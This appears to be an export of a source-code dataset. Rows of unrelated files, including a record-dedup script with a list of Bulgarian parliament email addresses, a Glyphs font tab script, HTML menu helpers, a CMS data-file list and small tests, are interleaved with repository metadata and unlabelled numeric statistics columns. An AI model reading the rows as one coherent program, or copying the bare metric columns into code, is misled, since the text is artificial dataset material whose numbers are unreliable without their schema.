'evdokia.asenova@parliament.bg', 'metodi.kostadinov@parliament.bg', '', '', 'kalin.milchev@parliament.bg', 'georgi.borisov@parliament.bg', 'georgi.andreev@parliament.bg', 'tasko.ermenkov@parliament.bg', 'penko.atanasov@parliament.bg', 'plamen.zhelyazkov@parliament.bg', '', '', '', '']
s = sorted(zip(name,force,url), key=lambda _:_[0])
sn = zip(*s)[0]
r = []
c = 3
for _ in set(name):
if name.count(_) == c:
i = sn.index(_)
r.append(s[i][2])
r.append(s[i+1][2])
c = 4
for _ in set(name):
if name.count(_) == c:
i = sn.index(_)
r.append(s[i][2])
r.append(s[i+1][2])
c = 5
for _ in set(name):
if name.count(_) >= c:
i = sn.index(_)
r.append(s[i][2])
r.append(s[i+1][2])
c = 2
for _ in set(name):
if name.count(_) >= c:
i = sn.index(_)
if s[i+1][1] != s[i][1]:
r.append(s[i][2])
else:
r.append(s[i][2])
r.append(s[i+1][2])
c = 1
for _ in set(name):
if name.count(_) == c:
i = sn.index(_)
r.append(s[i][2])
r.sort()
print([_ for _ in r if _>1138])
print(len([_ for _ in r if _>1138]))
print(len(r))
| 3,426.607843
| 93,731
| 0.713631
| 39,431
| 174,757
| 3.161827
| 0.028404
| 0.07214
| 0.103229
| 0.071707
| 0.923224
| 0.918564
| 0.909949
| 0.79213
| 0.79213
| 0.776345
| 0
| 0.247406
| 0.024377
| 174,757
| 50
| 93,732
| 3,495.14
| 0.483833
| 0
| 0
| 0.531915
| 0
| 17.255319
| 0.939951
| 0.774464
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0.021277
| 0.021277
| 0
| 0.021277
| 0.06383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
52cbc3f6966bc8acd6caef1bf613f6e4d3902bfb
| 737
|
py
|
Python
|
Tabs/Tab with fractions.py
|
huertatipografica/huertatipografica-scripts
|
cca4be41782bb622913d5d0e967fc489f7128769
|
[
"Apache-2.0"
] | 19
|
2015-09-17T11:55:39.000Z
|
2021-02-24T18:29:02.000Z
|
Tabs/Tab with fractions.py
|
andrestelex/huertatipografica-scripts
|
cca4be41782bb622913d5d0e967fc489f7128769
|
[
"Apache-2.0"
] | 2
|
2015-11-07T00:57:46.000Z
|
2016-08-25T23:15:12.000Z
|
Tabs/Tab with fractions.py
|
andrestelex/huertatipografica-scripts
|
cca4be41782bb622913d5d0e967fc489f7128769
|
[
"Apache-2.0"
] | 1
|
2015-05-06T23:52:37.000Z
|
2015-05-06T23:52:37.000Z
|
# MenuTitle: Tab with fractions
tabString = """/percent/perthousand/space/period/space/fraction
/zero.numr/zero.numr/fraction/zero.dnom/zero.dnom/space/space/zero.numr/one.numr/fraction/one.dnom/zero.dnom/space/space/zero.numr/two.numr/fraction/two.dnom/zero.dnom/space/space/zero.numr/three.numr/fraction/three.dnom/zero.dnom/space/space/zero.numr/four.numr/fraction/four.dnom/zero.dnom/space/space/zero.numr/five.numr/fraction/five.dnom/zero.dnom/space/space/zero.numr/six.numr/fraction/six.dnom/zero.dnom/space/space/zero.numr/seven.numr/fraction/seven.dnom/zero.dnom/space/space/zero.numr/eight.numr/fraction/eight.dnom/zero.dnom/space/space/zero.numr/nine.numr/fraction/nine.dnom/zero.dnom/(null)
"""
Glyphs.font.newTab(tabString)
| 105.285714
| 605
| 0.807327
| 124
| 737
| 4.798387
| 0.209677
| 0.147899
| 0.201681
| 0.257143
| 0.453782
| 0.453782
| 0.453782
| 0
| 0
| 0
| 0
| 0
| 0.016282
| 737
| 6
| 606
| 122.833333
| 0.82069
| 0.039349
| 0
| 0
| 0
| 0.25
| 0.927762
| 0.924929
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e119db45feaf156b95e1991f902991d8d101f69
| 2,328
|
py
|
Python
|
app_src/helpers/template_helpers.py
|
davidholiday/smwyg
|
365f3cc1c6fa66f4ddfc037d314f062beb2969b0
|
[
"Apache-2.0"
] | null | null | null |
app_src/helpers/template_helpers.py
|
davidholiday/smwyg
|
365f3cc1c6fa66f4ddfc037d314f062beb2969b0
|
[
"Apache-2.0"
] | null | null | null |
app_src/helpers/template_helpers.py
|
davidholiday/smwyg
|
365f3cc1c6fa66f4ddfc037d314f062beb2969b0
|
[
"Apache-2.0"
] | null | null | null |
# getters for common blocks of template code
# copyright (c) 2018 wildduck.io
from app_src.admin.app_roles import *
def get_hamburger_menu_items_by_role(user_role_list):
hamburger_menu_items = ""
if ROLE_ADMIN in user_role_list:
hamburger_menu_items = __get_admin_hamburger_menu_items()
elif ROLE_RECRUITER in user_role_list:
hamburger_menu_items = __get_recruiter_hamburger_menu_items()
else:
hamburger_menu_items = __get_talent_hamburger_menu_items()
return hamburger_menu_items
def __get_admin_hamburger_menu_items():
"""
allows multiple templates to pull the same menu list items from one source of truth
Returns(str): html5 list elements for the hamburger menu
"""
return \
"<li><a href='/peekaboo'><span class='glyphicon glyphicon-king'></span> Admin</a></li>" + \
"<li><a href='/jobs'><span class='glyphicon glyphicon-briefcase'></span> Jobs</a></li>" + \
"<li><a href='/talent'><span class='glyphicon glyphicon-user'></span> Talent</a></li>" + \
"<li role='separator' class='divider'></li>" + \
"<li><a href='/logout'><span class='glyphicon glyphicon-log-out'></span> Logout </a></li>"
def __get_recruiter_hamburger_menu_items():
"""
allows multiple templates to pull the same menu list items from one source of truth
Returns(str): html5 list elements for the hamburger menu
"""
return \
"<li><a href='/jobs'><span class='glyphicon glyphicon-briefcase'></span> Jobs</a></li>" + \
"<li><a href='/talent'><span class='glyphicon glyphicon-user'></span> Talent</a></li>" + \
"<li role='separator' class='divider'></li>" + \
"<li><a href='/logout'><span class='glyphicon glyphicon-log-out'></span> Logout </a></li>"
def __get_talent_hamburger_menu_items():
"""
allows multiple templates to pull the same menu list items from one source of truth
Returns(str): html5 list elements for the hamburger menu
"""
return \
"<li><a href='/'><span class='glyphicon glyphicon-home'></span> Home</a></li>" + \
"<li role='separator' class='divider'></li>" + \
"<li><a href='/logout'><span class='glyphicon glyphicon-log-out'></span> Logout </a></li>"
| 34.746269
| 106
| 0.65421
| 314
| 2,328
| 4.656051
| 0.207006
| 0.133379
| 0.147743
| 0.166211
| 0.800958
| 0.730506
| 0.709986
| 0.709986
| 0.662107
| 0.662107
| 0
| 0.003702
| 0.187715
| 2,328
| 66
| 107
| 35.272727
| 0.769434
| 0.214777
| 0
| 0.464286
| 0
| 0.321429
| 0.539683
| 0.176304
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.035714
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5e263a28e26eb535ac4b6c9f200823f4b809c6b7
| 269
|
py
|
Python
|
pocketutils/full.py
|
dmyersturnbull/pocketutils
|
57139e65cb4a7901c546c0623caf06cd384177d1
|
[
"Apache-2.0"
] | 1
|
2021-11-07T22:22:29.000Z
|
2021-11-07T22:22:29.000Z
|
pocketutils/full.py
|
dmyersturnbull/pocketutils
|
57139e65cb4a7901c546c0623caf06cd384177d1
|
[
"Apache-2.0"
] | 117
|
2021-01-06T00:30:25.000Z
|
2022-03-28T23:12:11.000Z
|
pocketutils/full.py
|
dmyersturnbull/pocketutils
|
57139e65cb4a7901c546c0623caf06cd384177d1
|
[
"Apache-2.0"
] | null | null | null |
from pocketutils.core import OptRow, SmartEnum, frozenlist
from pocketutils.core.chars import *
from pocketutils.core.exceptions import *
from pocketutils.core.input_output import *
from pocketutils.core.iterators import *
from pocketutils.tools.all_tools import Tools
| 38.428571
| 58
| 0.840149
| 35
| 269
| 6.4
| 0.4
| 0.401786
| 0.424107
| 0.334821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096654
| 269
| 6
| 59
| 44.833333
| 0.921811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5e2a1baa79f641f5e392f28047db209868e10610
| 10,489
|
py
|
Python
|
TopQuarkAnalysis/TopPairBSM/python/RecoInput_ZPrime5000JJ_RelVal_cfi.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 6
|
2017-09-08T14:12:56.000Z
|
2022-03-09T23:57:01.000Z
|
TopQuarkAnalysis/TopPairBSM/python/RecoInput_ZPrime5000JJ_RelVal_cfi.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 545
|
2017-09-19T17:10:19.000Z
|
2022-03-07T16:55:27.000Z
|
TopQuarkAnalysis/TopPairBSM/python/RecoInput_ZPrime5000JJ_RelVal_cfi.py
|
SWuchterl/cmssw
|
769b4a7ef81796579af7d626da6039dfa0347b8e
|
[
"Apache-2.0"
] | 14
|
2017-10-04T09:47:21.000Z
|
2019-10-23T18:04:45.000Z
|
# from /RelValZPrime5000JJ/CMSSW_2_1_0_pre6-RelVal-1214239099-STARTUP_V1-2nd/GEN-SIM-DIGI-RAW-HLTDEBUG-RECO
import FWCore.ParameterSet.Config as cms
# from
def RecoInput() :
return cms.Source("PoolSource",
debugVerbosity = cms.untracked.uint32(200),
debugFlag = cms.untracked.bool(True),
fileNames = cms.untracked.vstring(
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/02123B00-BC42-DD11-8A59-000423D6CA02.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/022373EC-B342-DD11-8E53-001617E30F4C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/04E4364D-C242-DD11-8481-000423D6CA72.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0A69E636-C142-DD11-9B5D-000423D992DC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0C050842-B542-DD11-B5D4-000423D94E70.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0C156BF8-B842-DD11-A1E7-000423D9853C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0C82D302-B642-DD11-8910-0019DB29C5FC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/0E63D7BD-B442-DD11-9E76-001617DBD332.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/10AB3A52-B442-DD11-9A6B-001617DBD288.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1448781B-B742-DD11-883B-000423D998BA.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/145049C2-BE42-DD11-83C0-000423D9870C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1468D509-BF42-DD11-AE17-000423D6BA18.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1497D214-B542-DD11-A818-001617E30D00.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/163B3739-BD42-DD11-B5E4-001617DBCF1E.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1853C569-C142-DD11-B955-000423D6CAF2.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1ACFE920-C242-DD11-8C90-000423D6B444.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1ADE73A2-C042-DD11-9E30-001617DF785A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/1E5AAFF3-B342-DD11-BC28-001617C3B6E8.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/22E86C41-B742-DD11-AAB8-000423D94A04.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/22F77CBD-C142-DD11-9761-000423D6AF24.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/269B56F8-B942-DD11-B20D-0019DB29C614.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/26CEEB02-B542-DD11-AF71-00161757BF42.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2A86C27B-BD42-DD11-ABC5-001617C3B76A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2AC44294-B442-DD11-91F0-000423D9870C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2C145D12-C042-DD11-BFFB-001617E30F58.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2C811DD2-B442-DD11-B501-001617DBD5B2.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/2ECD8DD9-DA42-DD11-AD6C-000423D6CAF2.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/34F4DD17-B642-DD11-9C7F-001617E30CC8.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/3E07AFA1-C042-DD11-94B6-001617E30E2C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/423AF539-B542-DD11-AD01-000423D98E54.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/4C9EB506-B542-DD11-9DD5-000423D9853C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/50C7B709-B542-DD11-9C50-000423D992DC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/52644119-B442-DD11-B107-001617DF785A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/52BA9CAB-B642-DD11-8678-000423D99A8E.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/5A8ED482-D042-DD11-AA45-000423D6B358.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/5E6B8E52-B642-DD11-91F4-000423D99CEE.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6030B4FD-B442-DD11-B1B3-000423D6C8EE.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6821370D-B642-DD11-9465-000423D990CC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6A575E8C-BE42-DD11-A534-000423D6CAF2.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/6E8B6FCE-BA42-DD11-86CB-000423D985E4.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/704C6DE2-BD42-DD11-857D-000423D9939C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/7201E196-C042-DD11-8619-000423D6BA18.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/7AF8CA3B-B542-DD11-A56A-001617DBD332.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/8030EBE3-D642-DD11-A92F-000423D9870C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/82CAEE7B-BD42-DD11-8075-001617C3B76A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/861DDE4E-C242-DD11-A7DD-000423D9863C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/88CD0478-0643-DD11-9F29-000423D9853C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/90CC5B4C-B642-DD11-BF7B-0019DB2F3F9B.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9238E2D5-BA42-DD11-8F68-000423D9939C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/92466FF6-BD42-DD11-A013-001617E30F58.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9A7E7932-B542-DD11-8DBD-001617DF785A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9C27E5CB-BE42-DD11-ABCB-000423D6B358.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/9C6F2DFC-BC42-DD11-8363-000423D992DC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/A27F84F9-C042-DD11-BA4E-000423DD2F34.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/A287D080-B842-DD11-9B8D-001617E30D0A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/A6298D5E-B442-DD11-BDD1-001617DBCF1E.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/AE42126E-BD42-DD11-B24F-001617C3B76E.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/B629193F-B542-DD11-8FA0-001617C3B710.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/BAA41619-B442-DD11-A8F1-001617E30D52.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/BAEF42C3-B542-DD11-8008-000423D98EA8.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/C49C9A04-C042-DD11-A1AD-001617E30F50.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/C66658E5-B442-DD11-A28D-000423D98950.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/CA974CA5-B242-DD11-AFE0-001617C3B5D8.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/CAB3A95C-B442-DD11-846A-001617C3B6CC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/CE3CDA38-C042-DD11-9A73-000423D6C8E6.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/D2940B94-B442-DD11-B5F3-001617C3B706.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/D2DDA5BB-BD42-DD11-A491-001617DBD5AC.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DAC11869-C042-DD11-8F79-000423D98DB4.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DC682983-B542-DD11-8DB0-000423D95220.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DCC90E90-B242-DD11-9969-001617E30D00.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DCF131B7-C242-DD11-8A65-000423D9880C.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DE3BC247-B542-DD11-BF36-001617C3B79A.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/DE4AA6E3-BC42-DD11-9F6E-001617C3B778.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/E0C7BA99-B442-DD11-8F2C-001617C3B778.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/E8D00DF6-B242-DD11-9C32-000423D992A4.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/EE7E76CB-BB42-DD11-BCC5-001617C3B6E2.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/F40F9434-B742-DD11-9344-000423D985B0.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/F6745063-BF42-DD11-8000-000423D6B444.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/FA726640-C042-DD11-9035-00161757BF42.root',
'/store/relval/2008/6/25/RelVal-RelValZPrime5000JJ-1214239099-STARTUP_V1-2nd/0007/FE6CFC98-B542-DD11-9608-000423D98BC4.root'
)
)
| 110.410526
| 125
| 0.825627
| 1,485
| 10,489
| 5.774411
| 0.191919
| 0.160583
| 0.179475
| 0.207813
| 0.723032
| 0.723032
| 0.723032
| 0.723032
| 0.723032
| 0.723032
| 0
| 0.379284
| 0.017924
| 10,489
| 94
| 126
| 111.585106
| 0.45316
| 0.010487
| 0
| 0
| 0
| 0.909091
| 0.941687
| 0.940723
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011364
| true
| 0
| 0.011364
| 0.011364
| 0.034091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
eaa477c26af035ba04c8b459c1ca9c3da3753252
| 119
|
py
|
Python
|
InterestingFacts.py
|
EdgarVallejo96/pyEdureka
|
f103f67ed4f9eee6ab924237e9d94a489e602c7c
|
[
"MIT"
] | null | null | null |
InterestingFacts.py
|
EdgarVallejo96/pyEdureka
|
f103f67ed4f9eee6ab924237e9d94a489e602c7c
|
[
"MIT"
] | null | null | null |
InterestingFacts.py
|
EdgarVallejo96/pyEdureka
|
f103f67ed4f9eee6ab924237e9d94a489e602c7c
|
[
"MIT"
] | null | null | null |
# Printing: ',' vs '+'
print("Hallo", 'Welt')
print("Hallo" + "Welt")
print("Nummer:", 100)
print("Number:" + str(100))
| 23.8
| 27
| 0.579832
| 15
| 119
| 4.6
| 0.6
| 0.289855
| 0.405797
| 0.550725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 0.117647
| 119
| 5
| 27
| 23.8
| 0.6
| 0.168067
| 0
| 0
| 0
| 0
| 0.326531
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
eae58a7486469d632b2527aa2c9981964a9e39b6
| 145
|
py
|
Python
|
textworld/gym/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/gym/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/gym/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
from textworld.gym.utils import make_batch
from textworld.gym.utils import register_game, register_games
from textworld.gym.core import Agent
| 36.25
| 62
| 0.841379
| 22
| 145
| 5.409091
| 0.545455
| 0.327731
| 0.403361
| 0.352941
| 0.453782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110345
| 145
| 3
| 63
| 48.333333
| 0.922481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
eaf03970fe6c7ff117336d98634a32167742bc60
| 203
|
py
|
Python
|
os.path/test_splitext.py
|
AEMICS/pycopy-lib
|
56f4436123e30be9928662361098a71cae82eecc
|
[
"PSF-2.0"
] | 126
|
2019-07-19T14:42:41.000Z
|
2022-03-21T22:22:19.000Z
|
os.path/test_splitext.py
|
AEMICS/pycopy-lib
|
56f4436123e30be9928662361098a71cae82eecc
|
[
"PSF-2.0"
] | 38
|
2019-08-28T01:46:31.000Z
|
2022-03-17T05:46:51.000Z
|
os.path/test_splitext.py
|
AEMICS/pycopy-lib
|
56f4436123e30be9928662361098a71cae82eecc
|
[
"PSF-2.0"
] | 55
|
2019-08-02T09:32:33.000Z
|
2021-12-22T11:25:51.000Z
|
from os.path import splitext
assert splitext("foo") == ("foo", "")
assert splitext(".foo") == (".foo", "")
assert splitext("foo.bar") == ("foo", ".bar")
assert splitext(".foo.bar") == (".foo", ".bar")
| 25.375
| 47
| 0.571429
| 25
| 203
| 4.64
| 0.32
| 0.482759
| 0.586207
| 0.344828
| 0.793103
| 0.793103
| 0.491379
| 0
| 0
| 0
| 0
| 0
| 0.128079
| 203
| 7
| 48
| 29
| 0.655367
| 0
| 0
| 0
| 0
| 0
| 0.216749
| 0
| 0
| 0
| 0
| 0
| 0.8
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d80685ec948125f44aa911b822ff4cc076597833
| 3,172
|
py
|
Python
|
src/pycoils/pycoils/tests/misc/test_bit_vector.py
|
harisankar-krishna-swamy/coils
|
2fb9606ee2df9c49db4ab67ee650ff8edc285a7e
|
[
"Apache-2.0"
] | 2
|
2020-12-29T18:37:07.000Z
|
2021-05-11T12:48:04.000Z
|
src/pycoils/pycoils/tests/misc/test_bit_vector.py
|
harisankar-krishna-swamy/coils
|
2fb9606ee2df9c49db4ab67ee650ff8edc285a7e
|
[
"Apache-2.0"
] | null | null | null |
src/pycoils/pycoils/tests/misc/test_bit_vector.py
|
harisankar-krishna-swamy/coils
|
2fb9606ee2df9c49db4ab67ee650ff8edc285a7e
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import random
from pycoils.misc.bit_vector import BitVector, BV_DEFAULT_MAX_VALUE
class TestBitVectorDefaultInstance(unittest.TestCase):
def setUp(self):
self.bv = BitVector()
